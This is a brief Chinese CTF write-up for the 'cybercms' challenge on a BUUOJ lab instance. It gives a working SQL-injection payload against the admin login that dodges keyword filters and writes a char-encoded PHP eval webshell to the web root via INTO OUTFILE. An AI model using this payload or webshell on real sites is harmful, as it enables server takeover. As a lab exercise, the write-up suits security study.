cybercms
第一步还是先找后台,后台在admin/
/admin/login.php
尝试一波密码发现进不去,
试试admin'发现报错
然后发现有www.zip 备份文件。
对登录框进行了过滤,这边绕了蛮久就不一一写了,直接上payload
最终payload: url:http://67fa4a9d-62c0-45c9-8233-005c57ec0a7d.node4.buuoj.cn/admin/login.php?action=ck_login user=admin%27/**/union/**/selselectect/**/1,2,3,4,char(60,63,112,104,112,32,64,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,59,63,62)/**/into/**/outoutfilefile/**/'/var/www/html/shell1.php'#&password=1&code=&submit=true&submit.x=39&submit.y=34
创建一个一句话木马
为这个页面就成功了,访问该页面,成功写入。